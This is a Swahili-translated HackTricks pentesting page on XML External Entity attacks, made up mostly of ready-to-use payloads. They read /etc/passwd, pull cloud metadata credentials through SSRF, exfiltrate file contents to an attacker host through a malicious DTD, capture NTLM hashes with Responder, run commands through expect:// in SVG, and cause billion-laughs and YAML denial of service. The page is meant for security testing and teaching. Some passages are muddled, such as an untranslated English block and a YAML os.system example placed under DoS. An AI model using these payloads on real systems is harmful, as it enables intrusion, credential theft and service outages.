hacktricks/pentesting-web/xxe-xee-xml-external-entity.md

# XXE - XEE - Kifaa cha Nje cha XML

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>


## Misingi ya XML

XML ni lugha ya alama iliyoundwa kwa ajili ya kuhifadhi na kusafirisha data, ikijumuisha muundo unaoweza kubadilika ambao unaruhusu matumizi ya vitambulisho vilivyopewa majina ya kuelezea. Tofauti na HTML, XML haikuwa imefungwa kwa seti ya vitambulisho vilivyopangwa mapema. Umuhimu wa XML umepungua na kuongezeka kwa JSON, licha ya jukumu lake la awali katika teknolojia ya AJAX.

- **Uwakilishi wa Data kupitia Vitengo**: Vitengo katika XML huruhusu uwakilishi wa data, ikiwa ni pamoja na herufi maalum kama `&lt;` na `&gt;`, ambazo zinafanana na `<` na `>` ili kuepuka mgongano na mfumo wa vitambulisho vya XML.

- **Kuainisha Vitengo vya XML**: XML inaruhusu kuainisha aina za vitengo, ikielezea jinsi vitengo vinavyopaswa kuwa na muundo na ni aina gani ya maudhui yanayoweza kuwa nayo, kutoka aina yoyote ya maudhui hadi vitengo vya watoto maalum.

- **Ufafanuzi wa Aina ya Nyaraka (DTD)**: DTD ni muhimu katika XML kwa kuainisha muundo wa nyaraka na aina za data inaweza kuwa nayo. Wanaweza kuwa ndani, nje, au mchanganyiko, na kuongoza jinsi nyaraka zinavyopangwa na kuthibitishwa.

- **Vitengo vya Kibinafsi na vya Nje**: XML inasaidia uundaji wa vitengo vya kibinafsi ndani ya DTD kwa uwakilishi wa data wenye mabadiliko. Vitengo vya nje, vilivyoelezwa na URL, vinazua wasiwasi wa usalama, haswa katika muktadha wa mashambulio ya XML External Entity (XXE), ambayo yanatumia jinsi wapangaji wa XML wanavyoshughulikia vyanzo vya data vya nje: `<!DOCTYPE foo [ <!ENTITY myentity "value" > ]>`

- **Ugunduzi wa XXE kwa Kutumia Vitengo vya Parameta**: Kwa kugundua udhaifu wa XXE, haswa wakati njia za kawaida zinashindwa kutokana na hatua za usalama za mpangaji, vitengo vya parameta vya XML vinaweza kutumika. Vitengo hivi huruhusu matumizi ya njia za ugunduzi nje ya mtandao, kama vile kuzindua utaftaji wa DNS au ombi la HTTP kwa kikoa kilichodhibitiwa, ili kuthibitisha udhaifu.
- `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>`
- `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://attacker.com" > ]>`


## Mashambulizi Makuu

**[Mashambulizi mengi haya yalijaribiwa kwa kutumia maabara ya kushangaza ya Portswiggers XEE: https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)**

### Jaribio la Kifaa Kipya

Katika shambulio hili, nita jaribu kama tangazo rahisi la KIFAA jipya linaweza kufanya kazi.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY toreplace "3"> ]>
<stockCheck>
<productId>&toreplace;</productId>
<storeId>1</storeId>
</stockCheck>
```
![](<../.gitbook/assets/image (220).png>)

### Soma faili

Hebu jaribu kusoma `/etc/passwd` kwa njia tofauti. Kwa Windows unaweza kujaribu kusoma: `C:\windows\system32\drivers\etc\hosts`

Katika kesi hii ya kwanza, tafadhali kumbuka kwamba SYSTEM "_\*\*file:///\*\*etc/passwd_" pia itafanya kazi.
```xml
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>
```
![](<../.gitbook/assets/image (221).png>)

Kesi ya pili hii inaweza kuwa na manufaa kutoa faili ikiwa seva ya wavuti inatumia PHP (Sio kesi ya Maabara ya Portswiggers)
```xml
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
<data>&example;</data>
```
Katika kesi hii ya tatu, tafadhali kumbuka tunatangaza `Element stockCheck` kama ANY
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT stockCheck ANY>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&file;</productId>
<storeId>1</storeId>
</stockCheck3>
```
![](<../.gitbook/assets/image (222) (1).png>)

### Orodha ya Mwongozo

Katika programu zinazotegemea **Java**, inaweza kuwa inawezekana **kuorodhesha maudhui ya saraka** kupitia XXE na mzigo kama huu (tuulize saraka badala ya faili):
```xml
<!-- Root / -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root>

<!-- /etc/ -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]><root><foo>&xxe;</foo></root>
```
### SSRF

XXE inaweza kutumika kudhuru SSRF ndani ya wingu
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
```
### Blind SSRF

Kwa kutumia **njia iliyotajwa hapo awali**, unaweza kufanya seva kupata seva unayodhibiti ili kuonyesha kuwa ina kasoro. Lakini, ikiwa hiyo haifanyi kazi, labda ni kwa sababu **vifaa vya XML haviruhusiwi**, katika kesi hiyo unaweza jaribu kutumia **vifaa vya XML vigezo**:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://gtd8nhwxylcik0mt2dgvpeapkgq7ew.burpcollaborator.net"> %xxe; ]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
### "Blind" SSRF - Kuvuja data nje ya wigo

**Katika tukio hili, tutafanya seva kupakia DTD mpya na mzigo mbaya ambao utatuma maudhui ya faili kupitia ombi la HTTP (kwa faili zenye mistari mingi unaweza kujaribu kuvuja kupitia** _**ftp://**_**). Maelezo haya yanategemea** [**maabara ya Portswiggers hapa**](https://portswigger.net/web-security/xxe/blind)**.**

Katika DTD mbaya iliyotolewa, hatua kadhaa zinafanywa ili kuvuja data:

### Mfano wa DTD Mbaya:
```xml
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
```
Hatua zinazotekelezwa na DTD hii ni:

1. **Ufafanuzi wa Parameter Entities:**
- Kipengele cha parameter cha XML, `%file`, kinatengenezwa, kikisoma maudhui ya faili `/etc/hostname`.
- Kipengele kingine cha parameter cha XML, `%eval`, kinatambulishwa. Kinafafanua kwa kudinamikisha kipengele kingine cha parameter cha XML, `%exfiltrate`. Kipengele cha `%exfiltrate` kinasanidiwa kufanya ombi la HTTP kwenye seva ya muharibifu, kikipitisha maudhui ya kipengele cha `%file` ndani ya string ya swali ya URL.

2. **Utekelezaji wa Entities:**
- Kipengele cha `%eval` kinatumika, kusababisha utekelezaji wa tangazo la kipengele cha `%exfiltrate` kinachodinamikishwa.
- Kipengele cha `%exfiltrate` kinatumika kisha, kusababisha ombi la HTTP kwenye URL iliyotajwa na maudhui ya faili.

Muharibifu anahifadhi DTD hii yenye nia mbaya kwenye seva inayodhibitiwa na wao, kawaida kwenye URL kama `http://web-attacker.com/malicious.dtd`.

**XXE Payload:**
Ili kutumia programu inayoweza kudhurika, muharibifu anatuma mzigo wa XXE:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
Hii payload inadefine XML parameter entity `%xxe` na kuichanganya ndani ya DTD. Wakati inapopitishwa na kisomaji wa XML, payload hii inapata DTD ya nje kutoka kwenye seva ya mshambuliaji. Kisha kisomaji huchambua DTD hiyo kwa mstari, kutekeleza hatua zilizoelezwa kwenye DTD mbaya na kusababisha kuvuja kwa faili ya `/etc/hostname` kwenda kwenye seva ya mshambuliaji.

### Kosa Kulingana na Kosa (External DTD)

**Katika kesi hii, tutafanya seva ipakie DTD mbaya ambayo itaonyesha maudhui ya faili ndani ya ujumbe wa kosa (hii ni sahihi tu ikiwa unaweza kuona ujumbe wa kosa).** [**Mfano kutoka hapa.**](https://portswigger.net/web-security/xxe/blind)

Ujumbe wa kosa wa kuchambua XML, unaofunua maudhui ya faili ya `/etc/passwd`, unaweza kusababishwa kwa kutumia Document Type Definition (DTD) mbaya ya nje. Hii inafanikiwa kupitia hatua zifuatazo:

1. Kipengele cha XML kinachoitwa `file` kinafafanuliwa, ambacho kina maudhui ya faili ya `/etc/passwd`.
2. Kipengele cha XML kinachoitwa `eval` kinafafanuliwa, kikiunganisha tangazo la kudumu kwa kipengele kingine cha XML kinachoitwa `error`. Kipengele hiki cha `error`, wakati kinapohesabiwa, kinajaribu kupakia faili isiyopo, kikiunganisha maudhui ya kipengele cha `file` kama jina lake.
3. Kipengele cha `eval` kinaitwa, kusababisha tangazo la kudumu la kipengele cha `error`.
4. Wito wa kipengele cha `error` unapelekea jaribio la kupakia faili isiyopo, likizalisha ujumbe wa kosa ambao unajumuisha maudhui ya faili ya `/etc/passwd` kama sehemu ya jina la faili.

DTD mbaya ya nje inaweza kuitwa na XML ifuatayo:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
Baada ya utekelezaji, jibu la seva ya wavuti linapaswa kuwa na ujumbe wa kosa unaonyesha maudhui ya faili ya `/etc/passwd`.

![](<../.gitbook/assets/image (223) (1).png>)

_**Tafadhali kumbuka kuwa DTD ya nje inaruhusu kuweka kipengele kimoja ndani ya kingine (****`eval`****), lakini inakatazwa katika DTD ya ndani. Kwa hivyo, huwezi kulazimisha kosa bila kutumia DTD ya nje (kawaida).**_

### **Kosa Kulingana na (DTD ya mfumo)**

Kwa hivyo, ni nini kuhusu udhaifu wa XXE wa kipofu wakati **mwingiliano wa nje wa bandia umefungwa** (mawasiliano ya nje hayapatikani)?

Hitilafu katika maelezo ya lugha ya XML inaweza **kufichua data nyeti kupitia ujumbe wa kosa wakati DTD ya hati inachanganya matangazo ya ndani na ya nje**. Shida hii inaruhusu upya wa ndani wa viumbe vilivyotangazwa kwa nje, kurahisisha utekelezaji wa mashambulio ya XXE yanayotegemea kosa. Mashambulio kama hayo yanatumia upya wa kipengele cha XML, kilichotangazwa awali katika DTD ya nje, kutoka ndani ya DTD ya ndani. Wakati mawasiliano ya nje ya bandia yanafungwa na seva, wadukuzi lazima wategemee faili za DTD za ndani kufanya shambulio, wakilenga kusababisha kosa la kuchambua ili kufichua habari nyeti.

Fikiria hali ambapo mfumo wa faili wa seva una faili ya DTD katika `/usr/local/app/schema.dtd`, ikifafanua kipengele kinachoitwa `custom_entity`. Mshambuliaji anaweza kusababisha kosa la kuchambua XML linalofichua maudhui ya faili ya `/etc/passwd` kwa kuwasilisha DTD ya kipekee kama ifuatavyo:
```xml
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
```
Hatua zilizoelezwa zinatekelezwa na DTD hii:

- Ufafanuzi wa kipengele cha XML kinachoitwa `local_dtd` unajumuisha faili ya DTD ya nje iliyoko kwenye mfumo wa seva.
- Ubadilishaji unatokea kwa kipengele cha XML cha `custom_entity`, kilichoelezwa awali katika DTD ya nje, ili kufunga [shambulio la XXE kulingana na makosa](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages). Ubadilishaji huu umebuniwa kusababisha kosa la uchambuzi, kuweka wazi maudhui ya faili ya `/etc/passwd`.
- Kwa kutumia kipengele cha `local_dtd`, DTD ya nje inahusishwa, ikijumuisha `custom_entity` iliyofafanuliwa hivi karibuni. Mfululizo huu wa hatua unasababisha kutolewa kwa ujumbe wa kosa uliolengwa na shambulio.

**Mfano halisi wa ulimwengu:** Mifumo inayotumia mazingira ya desktop ya GNOME mara nyingi ina DTD kwenye `/usr/share/yelp/dtd/docbookx.dtd` ambayo ina kipengele kinachoitwa `ISOamso`.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
![](<../.gitbook/assets/image (224).png>)

Kwa kuwa mbinu hii inatumia **internal DTD, kwanza unahitaji kupata moja inayofaa**. Unaweza kufanya hivi kwa **kusanikisha** mfumo wa **OS / Programu** ambayo seva inatumia na **kutafuta DTD za chaguo-msingi**, au **kupata orodha** ya **DTD za chaguo-msingi** ndani ya mifumo na **kuangalia** kama moja wapo ipo:
```xml
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>
```
Kwa habari zaidi angalia [https://portswigger.net/web-security/xxe/blind](https://portswigger.net/web-security/xxe/blind)

### Kupata DTDs ndani ya mfumo

Katika repo ya github nzuri ifuatayo unaweza kupata **njia za DTDs zinazoweza kuwepo katika mfumo**:

{% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" %}

Zaidi ya hayo, ikiwa una **picha ya Docker ya mfumo wa mwathirika**, unaweza kutumia zana ya repo hiyo hiyo kufanya **uchunguzi** wa **picha** na **kupata** njia za **DTDs** zilizopo ndani ya mfumo. Soma [Readme ya github](https://github.com/GoSecure/dtd-finder) ili kujifunza jinsi.
```bash
java -jar dtd-finder-1.2-SNAPSHOT-all.jar /tmp/dadocker.tar

Scanning TAR file /tmp/dadocker.tar

[=] Found a DTD: /tomcat/lib/jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd
Testing 0 entities : []

[=] Found a DTD: /tomcat/lib/servlet-api.jar!/jakarta/servlet/resources/XMLSchema.dtd
Testing 0 entities : []
```
### XXE kupitia Parsers za Office Open XML

Kwa maelezo zaidi kuhusu shambulio hili, **angalia sehemu ya pili ya [chapisho hili zuri](https://labs.detectify.com/2021/09/15/obscure-xxe-attacks/) kutoka Detectify**.

Uwezo wa **kupakia hati za Microsoft Office unatolewa na programu nyingi za wavuti**, ambazo kisha hufanya kazi ya kuchambua maelezo fulani kutoka kwenye hati hizo. Kwa mfano, programu ya wavuti inaweza kuruhusu watumiaji kuagiza data kwa kupakia karatasi ya muundo wa XLSX. Ili chombo cha kuchambua kiweze kuchukua data kutoka kwenye karatasi hiyo, bila shaka itahitaji kuchambua angalau faili moja ya XML.

Ili kujaribu udhaifu huu, ni muhimu kuunda **faili ya Microsoft Office inayojumuisha mzigo wa XXE**. Hatua ya kwanza ni kuunda saraka tupu ambapo hati hiyo itaweza kufunguliwa.

Baada ya hati kufunguliwa, faili ya XML iliyo katika njia `./unzipped/word/document.xml` inapaswa kufunguliwa na kuhaririwa kwa kutumia mhariri wa maandishi unaopendelewa (kama vile vim). XML inapaswa kuhaririwa ili kuongeza mzigo wa XXE unaotaka, mara nyingi ukiwa na ombi la HTTP.

Mistari iliyohaririwa ya XML inapaswa kuwekwa kati ya vitu viwili vya msingi vya XML. Ni muhimu kubadilisha URL na URL inayoweza kufuatiliwa kwa ombi.

Hatimaye, faili inaweza kufungwa kwa kuunda faili ya hati yenye nia mbaya poc.docx. Kutoka kwenye saraka iliyoundwa hapo awali "unzipped", amri ifuatayo inapaswa kutekelezwa:

Sasa, faili iliyoundwa inaweza kupakiwa kwenye programu ya wavuti inayoweza kuwa na udhaifu, na mtu anaweza kutumaini kuona ombi katika magogo ya Burp Collaborator.


### Itifaki ya Jar

Itifaki ya **jar** inapatikana kwa kipekee ndani ya **programu za Java**. Imetengenezwa ili kuwezesha ufikiaji wa faili ndani ya kiunzi cha **PKZIP** (k.m., `.zip`, `.jar`, n.k.), ikilenga faili za ndani na za mbali.
```
jar:file:///var/myarchive.zip!/file.txt
jar:https://download.host.com/myarchive.zip!/file.txt
```
{% hint style="danger" %}
Ili kuweza kupata faili ndani ya faili za PKZIP ni **muhimu sana kwa kutumia XXE kupitia faili za DTD za mfumo.** Angalia [sehemu hii ili kujifunza jinsi ya kutumia faili za DTD za mfumo](xxe-xee-xml-external-entity.md#error-based-system-dtd).
{% endhint %}

Mchakato wa kupata faili ndani ya kumbukumbu ya PKZIP kupitia itifaki ya jar unahusisha hatua kadhaa:

1. Ombi la HTTP linafanywa ili kupakua kumbukumbu ya zip kutoka eneo lililoelezwa, kama vile `https://download.website.com/archive.zip`.
2. Jibu la HTTP lenye kumbukumbu linahifadhiwa kwa muda kwenye mfumo, kawaida katika eneo kama `/tmp/...`.
3. Kumbukumbu inafunguliwa ili kupata maudhui yake.
4. Faili maalum ndani ya kumbukumbu, `file.zip`, inasomwa.
5. Baada ya operesheni, faili za muda zilizoundwa wakati wa mchakato huu zinafutwa.

Tekniki ya kuvuruga mchakato huu katika hatua ya pili inahusisha kuweka uhusiano wa seva wazi kwa muda usiojulikana wakati wa kutumikia faili ya kumbukumbu. Zana zilizopo kwenye [hifadhi hii](https://github.com/GoSecure/xxe-workshop/tree/master/24_write_xxe/solution) zinaweza kutumika kwa lengo hili, ikiwa ni pamoja na seva ya Python (`slow_http_server.py`) na seva ya Java (`slowserver.jar`).
```xml
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:http://attacker.com:8080/evil.zip!/evil.dtd">]>
<foo>&xxe;</foo>
```
{% hint style="danger" %}
Kuandika faili katika saraka ya muda inaweza kusaidia **kuongeza ukiukaji mwingine wa usalama unaohusisha kuvuka njia** (kama vile kuingiza faili za ndani, kuingiza templeti, RCE ya XSLT, deserialization, nk).
{% endhint %}

### XSS
```xml
<![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>
```
### DoS

#### Shambulio la Mabilioni ya Kicheko

```html
The Billion Laugh Attack is a type of Denial of Service (DoS) attack that targets XML parsers by exploiting the XML External Entity (XXE) vulnerability. This attack is named after the XML payload it uses, which consists of a small XML document containing a large number of nested entity references.

When an XML parser processes this payload, it expands the entity references recursively, resulting in exponential growth in memory consumption and CPU usage. This can overwhelm the target system, causing it to become unresponsive or crash.

To mitigate the Billion Laugh Attack, it is important to implement proper input validation and sanitization techniques when parsing XML input. Additionally, disabling external entity resolution or using a secure XML parser can help prevent this type of attack.

It is worth noting that the Billion Laugh Attack is just one example of how XXE vulnerabilities can be exploited. There are other variations and techniques that attackers can use to achieve similar results. Therefore, it is crucial to stay updated on the latest security practices and regularly patch any vulnerabilities in your systems.
```

Shambulio la Mabilioni ya Kicheko ni aina ya shambulio la Kukataa Huduma (DoS) ambalo linalenga wapangaji wa XML kwa kuchexploit kosa la XML External Entity (XXE). Shambulio hili limepewa jina kulingana na mzigo wa XML unaoitumia, ambao una hati ndogo ya XML inayojumuisha idadi kubwa ya marejeo ya kifungu kilichojumuishwa.

Wakati mpangaji wa XML anapoprocess mzigo huu, inapanua marejeo ya kifungu kwa njia ya kurudia, ikisababisha ukuaji wa kihesabu katika matumizi ya kumbukumbu na utumiaji wa CPU. Hii inaweza kuzidi mfumo wa lengo, ikisababisha usiweze kujibu au kushindwa.

Ili kupunguza Shambulio la Mabilioni ya Kicheko, ni muhimu kutekeleza mbinu sahihi za ukaguzi na usafi wa pembejeo wakati wa kuchambua pembejeo za XML. Aidha, kuzima ufumbuzi wa kifungu cha nje au kutumia mpangaji salama wa XML kunaweza kusaidia kuzuia aina hii ya shambulio.

Ni muhimu kutambua kuwa Shambulio la Mabilioni ya Kicheko ni mfano mmoja tu wa jinsi kosa la XXE linaweza kuchexploit. Kuna mabadiliko na mbinu nyingine ambazo wadukuzi wanaweza kutumia kufikia matokeo sawa. Kwa hivyo, ni muhimu kusasisha mara kwa mara mazoea ya usalama na kusasisha mara kwa mara kasoro yoyote katika mifumo yako.
```xml
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>
```
#### Shambulio la Yaml

Yaml ni muundo wa data unaotumiwa sana katika maombi ya wavuti. Shambulio la Yaml linaweza kutokea wakati maombi yanaruhusu kuingiza faili ya Yaml kutoka kwa mtumiaji bila kuzingatia usalama. Shambulio hili linaweza kusababisha kusoma au kutekeleza faili za mfumo zilizopo kwenye seva.

Kwa kufanya shambulio la Yaml, unaweza kutumia mbinu ya kuingiza kificho cha YAML ambacho kinaweza kusababisha kusoma au kutekeleza faili za mfumo. Kwa mfano, unaweza kutumia kificho cha YAML kama hiki:

```yaml
!!python/object/apply:os.system ['ls']
```

Katika mfano huu, tunatumia kificho cha YAML kutekeleza amri ya "ls" kwenye mfumo. Kwa kufanya hivyo, tunaweza kupata orodha ya faili zilizopo kwenye seva.

Ni muhimu kwa watengenezaji wa maombi kuhakikisha kuwa maingiliano ya Yaml yanafanywa kwa usalama na kuzuia uwezekano wa shambulio la Yaml. Hii inaweza kufanywa kwa kuchuja na kusafisha data ya Yaml kabla ya kuitumia kwenye maombi.
```xml
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
#### Shambulizi la Kuongezeka kwa Namba za Mraba

![](<../.gitbook/assets/image (531).png>)

#### Kupata NTML

Kwenye mifumo ya Windows, inawezekana kupata hash ya NTML ya mtumiaji wa seva ya wavuti kwa kuweka kichwa cha responder.py:
```bash
Responder.py -I eth0 -v
```
na kwa kutuma ombi lifuatalo
```xml
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM 'file://///attackerIp//randomDir/random.jpg'> ]>
<data>&example;</data>
```
Kisha unaweza jaribu kuvunja hash kwa kutumia hashcat

## Nyuso za XXE Zilizofichwa

### XInclude

Wakati wa kuunganisha data ya mteja katika hati za XML za upande wa seva, kama vile katika ombi za SOAP za nyuma, udhibiti moja kwa moja juu ya muundo wa XML mara nyingi ni mdogo, kuzuia mashambulizi ya kawaida ya XXE kutokana na vizuizi vya kubadilisha kipengele cha `DOCTYPE`. Walakini, shambulio la `XInclude` linatoa suluhisho kwa kuruhusu uingizaji wa vitengo vya nje ndani ya kipengele chochote cha data ya hati ya XML. Njia hii ni yenye ufanisi hata wakati sehemu tu ya data ndani ya hati ya XML iliyojengwa na seva inaweza kudhibitiwa.

Ili kutekeleza shambulio la `XInclude`, lazima itangazwe nafasi ya `XInclude`, na njia ya faili kwa kipengele cha nje kinachokusudiwa lazima itajwe. Hapa chini ni mfano mfupi wa jinsi shambulio kama hilo linaweza kuundwa:
```xml
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
```
Angalia [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) kwa maelezo zaidi!

### SVG - Kuleta Faili

Faili zilizopakiwa na watumiaji kwenye programu fulani, ambazo kisha hupitishwa kwenye seva, zinaweza kutumia udhaifu katika jinsi XML au muundo wa faili unaotumia XML unavyoshughulikiwa. Muundo wa faili maarufu kama hati za ofisi (DOCX) na picha (SVG) unategemea XML.

Wakati watumiaji **wanapakia picha**, picha hizi hupitishwa au kuhakikiwa kwenye seva. Hata kwa programu zinazotarajia muundo kama vile PNG au JPEG, **maktaba ya usindikaji wa picha ya seva inaweza pia kusaidia picha za SVG**. SVG, ikiwa ni muundo unaotumia XML, inaweza kutumiwa na wadukuzi kuwasilisha picha za SVG zenye nia mbaya, hivyo kuweka seva wazi kwa udhaifu wa XXE (XML External Entity).

Mfano wa shambulio kama hilo unaweza kuonekana hapa chini, ambapo picha ya SVG yenye nia mbaya inajaribu kusoma faili za mfumo:
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"><image xlink:href="file:///etc/hostname"></image></svg>
```
Njia nyingine inahusisha kujaribu **kutekeleza amri** kupitia PHP "expect" wrapper:
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
</svg>
```
Katika hali zote mbili, muundo wa SVG hutumiwa kufanya mashambulizi yanayotumia uwezo wa usindikaji wa XML wa programu ya seva, ikisisitiza umuhimu wa ukaguzi wa kina wa data na hatua za usalama.

Angalia [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) kwa maelezo zaidi!

**Tafadhali kumbuka kuwa mstari wa kwanza wa faili iliyosomwa au ya matokeo ya utekelezaji utaonekana NDANI ya picha iliyoundwa na SVG. Kwa hivyo unahitaji kuweza kupata picha iliyoundwa na SVG.**

### **PDF - Kupakia faili**

Soma chapisho lifuatalo ili **kujifunza jinsi ya kutumia XXE kupakia faili ya PDF**:

{% content-ref url="file-upload/pdf-upload-xxe-and-cors-bypass.md" %}
[pdf-upload-xxe-and-cors-bypass.md](file-upload/pdf-upload-xxe-and-cors-bypass.md)
{% endcontent-ref %}

### Content-Type: Kutoka x-www-urlencoded hadi XML

Ikiwa ombi la POST linakubali data katika muundo wa XML, unaweza kujaribu kutumia XXE katika ombi hilo. Kwa mfano, ikiwa ombi la kawaida lina data ifuatayo:
```xml
POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar
```
Kisha huenda ukaweza kuwasilisha ombi lifuatalo, na matokeo sawa:
```xml
POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
```
### Aina ya Yaliyomo: Kutoka JSON hadi XEE

Ili kubadilisha ombi, unaweza kutumia Kipengele cha Burp kinachoitwa "**Mbadala wa Aina ya Yaliyomo**". [Hapa](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html) unaweza kupata mfano huu:
```xml
Content-Type: application/json;charset=UTF-8

{"root": {"root": {
"firstName": "Avinash",
"lastName": "",
"country": "United States",
"city": "ddd",
"postalCode": "ddd"
}}}
```

```xml
Content-Type: application/xml;charset=UTF-8

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]>
<root>
<root>
<firstName>&xxe;</firstName>
<lastName/>
<country>United States</country>
<city>ddd</city>
<postalCode>ddd</postalCode>
</root>
</root>
```
Mfano mwingine unaweza kupatikana [hapa](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2).

## WAF & Uvunjaji wa Ulinzi

### Base64
```xml
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
```
Hii inafanya kazi tu ikiwa seva ya XML inakubali itifaki ya `data://`.

### UTF-7

